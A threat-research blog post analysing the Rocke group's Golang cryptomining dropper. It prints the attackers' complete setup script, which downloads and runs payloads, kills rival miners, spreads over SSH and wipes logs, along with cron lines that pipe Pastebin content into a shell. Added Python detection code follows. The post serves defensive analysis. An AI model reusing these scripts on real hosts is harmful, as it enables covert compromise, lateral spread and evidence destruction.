font weight change link.style.color = isOpen ? '#002B71' : '#000000'; link.style.fontWeight = isOpen ? '600' : 'normal'; // Change font weight to 600 when dropdown is open, otherwise, reset to normal }); } }); </script></div></header></header><main class="main-wrapper"><div class="section_header"><header class="header_sub-section background-color-darkblue"><div class="padding-global"><div class="container-large"><div class="padding-section-large padding-bottom-xxlarge tablet-version blog"><div class="header_text-center"><div class="max-width-xlarge"><div class="margin-bottom margin-medium"><div class="content-center blog"><div class="blog_header_text">March 15, 2019</div><div class="blog_header_text">-</div><div class="blog_header_text no-space">Anomali Threat Research</div><div class="w-condition-invisible">,</div><div class="blog_header_text w-dyn-bind-empty"></div></div></div><h1 class="blog-h1 text-align-center">Rocke Evolves Its Arsenal With a New Malware Family Written in Golang</h1></div></div></div></div></div></header><header class="header_sub-section overlap-header"><div class="padding-global"><div class="container-large"><div class="header_text-center"><div class="max-width-xlarge"><img src="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" loading="lazy" alt="" class="blog_cover-image"/></div></div></div></div></header><section class="section_resource_cta_final"><div class="padding-global"><div class="container-large"><div class="padding-section-medium"><div class="nested-collection-don-t-delete hide"><div class="w-dyn-list"><div fs-cmsnest-collection="category" fs-cmsnest-element="template-reference" role="list" class="w-dyn-items"><div role="listitem" class="w-dyn-item"><a href="/blog-categories/research" class="w-inline-block"><div>Research</div></a></div></div></div></div><div class="content-center direction-vertical"><div class="max-width-xlarge"><div class="body_component"><div 
class="body_component"><div class="blog-style w-embed"><style> .table { width: 100%; margin-bottom: 1rem; color: #212529 } .table th, .table td { padding: 0.75rem; vertical-align: top; border-top: 1px solid #dee2e6 } .table thead th { vertical-align: bottom; border-bottom: 2px solid #dee2e6 } .table tbody+tbody { border-top: 2px solid #dee2e6 } .table-sm th, .table-sm td { padding: 0.3rem } .table-bordered { border: 1px solid #dee2e6 } .table-bordered th, .table-bordered td { border: 1px solid #dee2e6 } .table-bordered thead th, .table-bordered thead td { border-bottom-width: 2px } .table-borderless th, .table-borderless td, .table-borderless thead th, .table-borderless tbody+tbody { border: 0 } .table-striped tbody tr:nth-of-type(odd) { background-color: rgba(0, 0, 0, 0.05) } .table-hover tbody tr:hover { color: #212529; background-color: rgba(0,0,0,0.075) } .table-anomali,.table-anomali>th,.table-anomali>td { background-color: #fceabd } .table-anomali th, .table-anomali td, .table-anomali thead th, .table-anomali tbody+tbody { border-color: #fad985 } .table-hover .table-anomali:hover { background-color: #fbe2a5 } .table-hover .table-anomali:hover > td, .table-hover .table-anomali:hover>th { background-color: #fbe2a5 } .table-anomali-blue,.table-anomali-blue>th,.table-anomali-blue>td { background-color: #b8d9fe } .table-anomali-blue th, .table-anomali-blue td, .table-anomali-blue thead th, .table-anomali-blue tbody+tbody { border-color: #7ab8fe } .table-hover .table-anomali-blue:hover { background-color: #9fccfe } .table-hover .table-anomali-blue:hover > td, .table-hover .table-anomali-blue:hover>th { background-color: #9fccfe } .table-primary,.table-primary>th,.table-primary>td { background-color: #b8daff } .table-primary th, .table-primary td, .table-primary thead th, .table-primary tbody+tbody { border-color: #7abaff } .table-hover .table-primary:hover { background-color: #9fcdff } .table-hover .table-primary:hover > td, .table-hover .table-primary:hover>th { 
background-color: #9fcdff } .table-secondary,.table-secondary>th,.table-secondary>td { background-color: #d6d8db } .table-secondary th, .table-secondary td, .table-secondary thead th, .table-secondary tbody+tbody { border-color: #b3b7bb } .table-hover .table-secondary:hover { background-color: #c8cbcf } .table-hover .table-secondary:hover > td, .table-hover .table-secondary:hover>th { background-color: #c8cbcf } .table-success,.table-success>th,.table-success>td { background-color: #c3e6cb } .table-success th, .table-success td, .table-success thead th, .table-success tbody+tbody { border-color: #8fd19e } .table-hover .table-success:hover { background-color: #b1dfbb } .table-hover .table-success:hover > td, .table-hover .table-success:hover>th { background-color: #b1dfbb } .table-info,.table-info>th,.table-info>td { background-color: #bee5eb } .table-info th, .table-info td, .table-info thead th, .table-info tbody+tbody { border-color: #86cfda } .table-hover .table-info:hover { background-color: #abdde5 } .table-hover .table-info:hover > td, .table-hover .table-info:hover>th { background-color: #abdde5 } .table-warning,.table-warning>th,.table-warning>td { background-color: #ffeeba } .table-warning th, .table-warning td, .table-warning thead th, .table-warning tbody+tbody { border-color: #ffdf7e } .table-hover .table-warning:hover { background-color: #ffe8a1 } .table-hover .table-warning:hover > td, .table-hover .table-warning:hover>th { background-color: #ffe8a1 } .table-danger,.table-danger>th,.table-danger>td { background-color: #f5c6cb } .table-danger th, .table-danger td, .table-danger thead th, .table-danger tbody+tbody { border-color: #ed969e } .table-hover .table-danger:hover { background-color: #f1b0b7 } .table-hover .table-danger:hover > td, .table-hover .table-danger:hover>th { background-color: #f1b0b7 } .table-light,.table-light>th,.table-light>td { background-color: #fdfdfe } .table-light th, .table-light td, .table-light thead th, .table-light 
tbody+tbody { border-color: #fbfcfc } .table-hover .table-light:hover { background-color: #ececf6 } .table-hover .table-light:hover > td, .table-hover .table-light:hover>th { background-color: #ececf6 } .table-dark,.table-dark>th,.table-dark>td { background-color: #c6c8ca } .table-dark th, .table-dark td, .table-dark thead th, .table-dark tbody+tbody { border-color: #95999c } .table-hover .table-dark:hover { background-color: #b9bbbe } .table-hover .table-dark:hover > td, .table-hover .table-dark:hover>th { background-color: #b9bbbe } .table-active,.table-active>th,.table-active>td { background-color: rgba(0, 0, 0, 0.075) } .table-hover .table-active:hover { background-color: rgba(0, 0, 0, 0.075) } .table-hover .table-active:hover > td, .table-hover .table-active:hover>th { background-color: rgba(0, 0, 0, 0.075) } .table .thead-dark th { color: #fff; background-color: #343a40; border-color: #454d55 } .table .thead-light th { color: #495057; background-color: #e9ecef; border-color: #dee2e6 } .table-dark { color: #fff; background-color: #343a40 } .table-dark th, .table-dark td, .table-dark thead th { border-color: #454d55 } .table-dark.table-bordered { border: 0 } .table-dark.table-striped tbody tr:nth-of-type(odd) { background-color: rgba(255, 255, 255, 0.05) } .table-dark.table-hover tbody tr:hover { color: #fff; background-color: rgba(255, 255, 255, 0.075) } @media (max-width: 575.98px) { .table-responsive-sm { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-sm>.table-bordered { border: 0 } } @media (max-width: 767.98px) { .table-responsive-md { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-md>.table-bordered { border: 0 } } @media (max-width: 991.98px) { .table-responsive-lg { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-lg>.table-bordered { border: 0 } } @media (max-width: 1199.98px) { 
.table-responsive-xl { display:block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive-xl>.table-bordered { border: 0 } } .table-responsive { display: block; width: 100%; overflow-x: auto; -webkit-overflow-scrolling: touch } .table-responsive>.table-bordered { border: 0 } .article-text p, .article-text ul, .article-body .article-text table { margin-bottom: 2rem } .pre { display: block; font-size: 87.5%; color: #fff } .pre code { font-size: inherit; color: black; word-break: normal } .pre-scrollable { max-height: 340px; overflow-y: scroll } .pre,code,kbd,samp { font-family: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace; font-size: 1em } .pre { margin-top: 0; margin-bottom: 1rem; overflow: auto; -ms-overflow-style: scrollbar } </style></div><div class="text-rich-text w-condition-invisible w-dyn-bind-empty w-richtext"></div><div class="imported_body_text"><div wb-element="text-data" class="import_data"><h2>Summary</h2><p>The “Rocke group”, a Chinese threat actor group that specializes in cryptojacking, has shifted gears on how it steals your CPU cycles. Rocke is actively updating and pushing a new dropper that uses Pastebin for Command and Control (C2). Updates to the C2 were observed as recently as March 13th, 2019, which leads researchers to believe this campaign is ongoing. According to VirusTotal, detection of the new dropper is nearly non-existent. In previous campaigns the group has been observed using the “ld.so.preload” mechanism to hook libc functions. The hooking hides the dropper and the mining software installed by the malware and prevents them from showing up in the list of running processes. The group is using this tactic again in this new campaign. 
The miner uses a private mining pool hosted on DigitalOcean, which is a change from the threat actor’s previous tactics.</p><h2>Introduction</h2><p>The threat actor group Rocke was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which the group used malware written in Python to orchestrate the infection and the spreading of its coinminer.[2] On March 12th, 2019, Anomali Research identified, with high confidence, a new active campaign that we believe is being conducted by Rocke. The objective of the campaign, as in other Rocke activity, is to drop a miner onto a machine to mine Monero cryptocurrency. The tactics, techniques, and procedures (TTPs) of this ongoing campaign overlap extensively with those in the report published by Unit 42.</p><p>This campaign differs from prior activity in that Rocke was observed using a new dropper written in Go (Golang) instead of Python. Detection of the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT: only one engine detected it as malicious. The low detection rate, coupled with the techniques that keep the Rocke processes out of the running process list on victim machines, raises the possibility that this campaign has been running successfully for weeks.</p><p style="text-align: center;"><em><img alt="Scanning results from VirusTotal for one of the malware samples" src="https://cdn.filestackcontent.com/iytoepbhR2ywK2oGKU1Q"/><br/> Figure 1: Scanning results from VirusTotal for one of the malware samples.</em></p><h2>Technical Details</h2><h3>Analysis of the Dropper</h3><p>The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. 
Instead of the “UPX!” magic string, the header contains “LSD!”. Restoring the original string is needed before the samples can be unpacked with the UPX project’s unpacker.</p><p>The dropper is written in Go (Golang). The estimated source code structure, based on the decompiler output, is shown below:</p><pre>
Package main: /root/go/src/github.com/hippies/LSD
  File: main.go
    goatt Lines: 12 to 17 (5)
    main Lines: 17 to 34 (17)
/root/go/src/github.com/hippies/LSD/LSDB
  File: a.go
    _kBytes Lines: 13 to 27 (14)
    KWR Lines: 27 to 36 (9)
  File: b.go
    _libBytes Lines: 10 to 17 (7)
    LibWrite Lines: 17 to 25 (8)
  File: c.go
    _netdnsinitBytes Lines: 11 to 18 (7)
    _netdnsserviceBytes Lines: 18 to 26 (8)
    NetdnsWrite Lines: 26 to 37 (11)
/root/go/src/github.com/hippies/LSD/LSDA
  File: a.go
    getiplista Lines: 12 to 37 (25)
    run Lines: 37 to 86 (49)
    runtwo Lines: 86 to 98 (12)
    Ago Lines: 98 to 108 (10)
    (Ago)func1 Lines: 103 to 106 (3)
  File: b.go
    getiplistb Lines: 18 to 42 (24)
    generateTask Lines: 42 to 54 (12)
    cmd Lines: 54 to 81 (27)
    (cmd)func1 Lines: 62 to 98 (36)
    cmdtwo Lines: 81 to 93 (12)
    bgo Lines: 93 to 113 (20)
    (bgo)func1 Lines: 98 to 101 (3)
    Bbgo Lines: 113 to 118 (5)
/root/go/src/github.com/hippies/LSD/LSDC
  File: a.go
    Read Lines: 17 to 43 (26)
    PathExists Lines: 43 to 54 (11)
    CopyFile Lines: 54 to 65 (11)
    Mkdir Lines: 65 to 69 (4)
    Writefile Lines: 69 to 79 (10)
    Writefiletwo Lines: 79 to 88 (9)
    Delfile Lines: 88 to 97 (9)
    Changetime Lines: 97 to 105 (8)
    Cmdexec Lines: 105 to 111 (6)
    Checkupdate Lines: 111 to 129 (18)
    Getip Lines: 129 to 149 (20)
    Getipb Lines: 149 to 164 (15)
    Cron Lines: 164 to 173 (9)
</pre><p>The main execution process can be summarized in the following steps:</p><ol><li>Deletes “/etc/ld.so.preload” if it exists</li><li>Gets the PID of its own process and writes it to “/tmp/.lsdpid”</li><li>Uses “chattr -i” to mark the PID file as protected so it cannot be modified</li><li>Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”</li><li>Sets the modification timestamp of the copied 
file back 416 days</li><li>Installs an “init.d” startup script at “/etc/init.d/netdns” and a systemd service unit at “/usr/lib/systemd/system/netdns.service”; the modification time of these files is changed in the same way</li><li>Enables the service on the compromised system by executing “chkconfig --add netdns” and “systemctl enable netdns”</li><li>Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”</li><li>Writes C source code to “/usr/local/lib/libcset.c”</li><li>Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”</li><li>If GCC is not installed, tries to install it with “yum -y install gcc -y||apt-get -y install gcc” and recompiles</li><li>Adds the path of the shared object to “/etc/ld.so.preload” and protects the file from modification</li><li>Adds persistence through cron by executing echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - and by appending “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh” to “/var/spool/cron/crontabs/root”</li><li>Checks for updates by comparing against the version listed at “https://pastebin.com/raw/HWBVXK6H”</li><li>Installs the Monero miner at “/tmp/kintegrityds” and protects it</li><li>The miner connects to a private pool hosted on DigitalOcean at IP and port 134.209.104.20:51640</li></ol><p>The malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to determine the machine’s external IP address so it does not attack itself.</p><h3>Command and Control</h3><p>The malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is used to check for the latest version of the malware. If a new version is available, the malware reaches out to “https://pastebin[.]com/yPRSa0ki”. 
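</p><p>The steps above describe the host artifacts the dropper leaves behind: an entry in /etc/ld.so.preload, files marked immutable with chattr, a modification time pushed back 416 days by the Changetime routine, and cron entries that fetch a paste and pipe it into a shell. The following Python is an added example of how a defender can check collected host data for those artifacts; it is not Anomali’s tooling or the dropper’s code. The sample inputs at the bottom are constructed, and the 30-day gap used by the timestomp heuristic is an assumption, not a value from the report.</p>

```python
"""Host-artifact checks for the dropper behaviour described above.
Added example; not Anomali's tooling. Every function takes captured text
or stat() timestamps, so it can run offline against collected evidence."""
from __future__ import annotations

import os
import re

# 1. /etc/ld.so.preload is normally absent or empty. Any entry outside the
#    distro library directories (the dropper writes /usr/local/lib/libcset.so)
#    deserves a look: a preloaded library can hook libc and hide processes.
DISTRO_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def suspicious_preload_entries(preload_text: str) -> list[str]:
    hits = []
    for line in preload_text.splitlines():
        entry = line.strip()
        if entry and not entry.startswith("#") and not entry.startswith(DISTRO_LIB_DIRS):
            hits.append(entry)
    return hits


# 2. Immutable attribute: parse `lsattr -d` output such as
#    "----i---------e---- /tmp/.lsdpid". The dropper sets +i on its PID
#    file, on /etc/ld.so.preload and on the miner so they resist deletion.
LSATTR_RE = re.compile(r"^(?P<flags>[-A-Za-z]+)\s+(?P<path>/.*)$")


def immutable_paths(lsattr_output: str) -> list[str]:
    found = []
    for line in lsattr_output.splitlines():
        m = LSATTR_RE.match(line.strip())
        if m and "i" in m.group("flags"):
            found.append(m.group("path"))
    return found


# 3. Timestomp heuristic. utimes()/`touch -r` can rewrite atime and mtime,
#    but ctime is set by the kernel on every metadata change and cannot be
#    chosen by the caller. A file whose mtime is far older than its ctime was
#    either timestomped or unpacked from a package that preserved build
#    times, so treat a hit as a lead to verify, not a verdict.
def looks_timestomped(mtime: float, ctime: float, min_gap_days: float = 30) -> bool:
    # Assumption: a 30-day gap is enough to separate the two cases on most hosts.
    return (ctime - mtime) > min_gap_days * 86400


def stat_times(path: str) -> tuple[float, float]:
    """(mtime, ctime) as epoch seconds, ready for looks_timestomped()."""
    st = os.stat(path)
    return st.st_mtime, st.st_ctime


# 4. Cron persistence: any entry that fetches a URL with curl/wget and pipes
#    the body into a shell, which is how both Rocke cron jobs are built.
FETCH_PIPE_SH = re.compile(
    r"\b(?:curl|wget)\b[^|\n]*https?://[^\s|)]+.*\|\s*(?:ba)?sh\b")


def fetch_and_pipe_entries(crontab_text: str) -> list[str]:
    return [ln for ln in crontab_text.splitlines() if FETCH_PIPE_SH.search(ln)]


# Constructed sample evidence (not captured from a real host).
SAMPLE_PRELOAD = "/usr/local/lib/libcset.so\n"
SAMPLE_LSATTR = ("----i---------e---- /tmp/.lsdpid\n"
                 "--------------e---- /etc/hosts\n")
SAMPLE_CRON = (
    "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||"
    "wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n")

if __name__ == "__main__":
    print("preload:", suspicious_preload_entries(SAMPLE_PRELOAD))
    print("immutable:", immutable_paths(SAMPLE_LSATTR))
    print("cron:", fetch_and_pipe_entries(SAMPLE_CRON))
    print("timestomped?", looks_timestomped(0.0, 416 * 86400.0))
```

<p>The ctime comparison is the part worth keeping: both the “touch -acmr /bin/sh” trick shown later in this post and the dropper’s Changetime routine leave ctime alone, so ctime still records when the file was really written or chattr’d. Feed the functions with the contents of /etc/ld.so.preload, “lsattr -d” output for the paths named in the steps, and “crontab -l” plus /var/spool/cron/crontabs/root; the immutable bit has to be cleared with “chattr -i” before any of the protected files can be removed.</p><p>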
The paste shown below serves as a redirect to the actual setup script.</p><pre>
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's/ //'|sh
</pre><p>The setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the threat actors’ malware instead. It also tries to use the known SSH hosts and the SSH key on the machine to spread laterally.</p><pre>
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -
mkdir -p /tmp
chmod 1777 /tmp
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdog"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchdogs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ksoftirqds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v kintegrityds|awk '{if($3&gt;=80.0) print $2}'|xargs kill -9
yum -y install coreutils||apt-get -y install coreutils
apt-get install cron -y||yum install crontabs -y||apk add cron -y
if [ ! -f "/tmp/.lsdpid" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    else
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    fi
    nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp;
elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    elif [ ${ARCH}x = "i686x" ]; then
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    else
        (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds
    fi
    nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp;
fi
if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp;
    done
fi
echo 0&gt;/var/spool/mail/root
echo 0&gt;/var/log/wtmp
echo 0&gt;/var/log/secure
echo 0&gt;/var/log/cron
#
</pre><p>The Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were added on February 24th, 2019.</p><p style="text-align: center;"><em><img alt="Pastebin profile used by the threat actor" src="https://cdn.filestackcontent.com/ujNmkh1WSJqf7vICOCGn"/><br/> Figure 2: Pastebin profile used by the threat actor</em></p><p>The server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below. 
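</p><p>The setup script above is a good candidate for automated triage, since every behaviour it implements (cron persistence through a paste, payloads fetched under image filenames, killing competing miners, harvesting known_hosts for SSH spreading, truncating logs) shows up as a recognisable shell idiom. The Python below is an added example, not Anomali’s tooling: it tags each line of a captured script with the behaviour it matches, maps the hits to the ATT&amp;CK IDs listed at the end of this post, and pulls out the URLs for blocking. The rule set is our own reading of the paste, the ATT&amp;CK mapping is ours, and the sample script is a constructed subset of the paste with the remote SSH command replaced by a no-op.</p>

```python
"""Static triage of a fetched setup script: tag each line with the behaviour
it implements. Added example; not Anomali's tooling. The rules below are a
hypothetical set written from the paste above; the ATT&CK IDs are the ones
the post lists, mapped by us."""
from __future__ import annotations

import re

# (label, ATT&CK ID from the post's list or None, pattern matched per line)
RULES = [
    ("cron persistence via remote script", "T1168",
     re.compile(r"\|\s*crontab -|/var/spool/cron")),
    ("payload fetched under an image filename", "T1036",
     re.compile(r"\b(?:curl|wget)\b.*https?://\S+\.(?:jpg|png|gif)\b")),
    ("kills competing processes", None,
     re.compile(r"\bkill -9\b")),
    ("harvests SSH known_hosts", None,
     re.compile(r"\bgrep\b.*known_hosts")),
    ("non-interactive SSH to harvested hosts", "T1021",
     re.compile(r"\bssh\b.*-oBatchMode=yes|\bssh\b.*StrictHostKeyChecking=no")),
    ("changes file attributes or permissions", "T1222",
     re.compile(r"\bchattr\s+\+i\b|\bchmod\b")),
    ("truncates logs", None,
     re.compile(r"echo\s+0\s*>\s*/var/log/")),
]


def triage(script_text: str) -> dict[str, list[int]]:
    """Map each matched behaviour label to the 1-based line numbers that hit."""
    findings: dict[str, list[int]] = {}
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for label, _, pattern in RULES:
            if pattern.search(line):
                findings.setdefault(label, []).append(lineno)
    return findings


def attack_ids(findings: dict[str, list[int]]) -> set[str]:
    """ATT&CK IDs (from the post's list) implied by the behaviours found."""
    return {tid for label, tid, _ in RULES if tid and label in findings}


def extract_urls(script_text: str) -> list[str]:
    """Every URL once, in order of first appearance, for blocking or lookup."""
    seen: list[str] = []
    for url in re.findall(r"https?://[^\s'\"|)]+", script_text):
        if url not in seen:
            seen.append(url)
    return seen


# Constructed sample: a trimmed subset of the paste above. The command the
# script would run over SSH is replaced with 'true' so the sample is inert.
SAMPLE_SCRIPT = """\
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab -
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
(curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) && chmod +x /tmp/kthrotlds
nohup /tmp/kthrotlds >/dev/null 2>&1 &
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do
ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'true' &
echo 0>/var/log/secure
"""

if __name__ == "__main__":
    found = triage(SAMPLE_SCRIPT)
    for label, lines in found.items():
        print(f"{label}: lines {lines}")
    print("ATT&CK:", sorted(attack_ids(found)))
    print("URLs:", extract_urls(SAMPLE_SCRIPT))
```

<p>One line in the paste that the rules above do not single out is worth a rule of its own: “ps aux … awk '{if($3&gt;=80.0) print $2}' | xargs kill -9” kills any process other than the actor’s own miner that is using 80% or more of a CPU. A legitimate CPU-heavy service dying for no apparent reason is therefore itself a lead that can be correlated with the cron and ld.so.preload checks.</p><p>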
The page asks visitors to upload their identity photo for the Chinese online shopping website Taobao.</p><p style="text-align: center;"><em><img alt="Image hosting site from which the malware is downloaded" src="https://cdn.filestackcontent.com/DvfNdcNyRlGMU0MbeUCU"/><br/> Figure 3: Image hosting site from which the malware is downloaded.</em></p><p>According to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is also registered with the same email address (4592248@gmail[.]com) as another domain used in an earlier Rocke campaign, which indicates that the site is likely controlled by the threat group.[3]</p><pre>
Domain Name: SOWCAR.COM
Registry Domain ID: 2277522871_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ename.com
Registrar URL: http://www.ename.net
Updated Date: 2019-03-08T01:38:36Z
Creation Date: 2018-06-21T11:14:39Z
Registry Expiry Date: 2019-06-21T11:14:39Z
Registrar: eName Technology Co., Ltd.
Registrar IANA ID: 1331
Registrar Abuse Contact Email: abuse@ename.com
Registrar Abuse Contact Phone: 86.4000044400
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DALE.NS.CLOUDFLARE.COM
Name Server: JOAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form:
Registry Registrant ID: Not Available From Registry
Registrant Name: LuWei
Registrant Organization: Lu Wei
Registrant Street: SiChuan ZhongLu 668 Hao 8 Lou
Registrant City: ShangHai
Registrant State/Province: ShangHai
Registrant Postal Code: 200000
Registrant Country: CN
Registrant Phone: +86.2139003725
Registrant Phone Ext:
Registrant Fax: +86.2139003725
Registrant Fax Ext:
Registrant Email: 4592248@gmail.com
Registry Admin ID: Not Available From Registry
</pre><h2>Overlapping TTPs with previous campaigns</h2><p>The current campaign has numerous TTPs overlapping with the previous 
campaign reported by Unit 42. In both campaigns, the group uses Pastebin for C2, and the C2 system depends on three public pastes: one serves the latest version, one acts as a redirect to the third, which is used to initialize the infection. The redirect uses either “cURL” or “wget” to fetch the initialization script from the paste, and the paste is “piped” to either “bash” or “sh” after some cleanup. In addition to the similarities in structure, the user account names also appear to follow a similar pattern: in this campaign the username is “SYSTEMTEN”, while in the previous campaign it was “SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.</p><p>The filenames of the payloads are also similar in the two most recently reported campaigns. Below are the URLs used to download the payload in this campaign and in the campaign reported by Unit 42. The filenames have the same structure, with some of the numbers overlapping.</p><pre>
http://sowcar.com/t6/678/1552060180x1822611359.jpg
https://master.minerxmr.ru/2/1551434778x2728329032.jpg
</pre><p>The malware uses cron for persistence. The similar crontab entries are shown below; the only difference between them is the ID of the paste used.</p><p>Cron jobs created by the Python version of the malware:</p><pre>
"*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"
"*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"
</pre><p>Cron jobs created by the Go version of the malware:</p><pre>
*/10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##
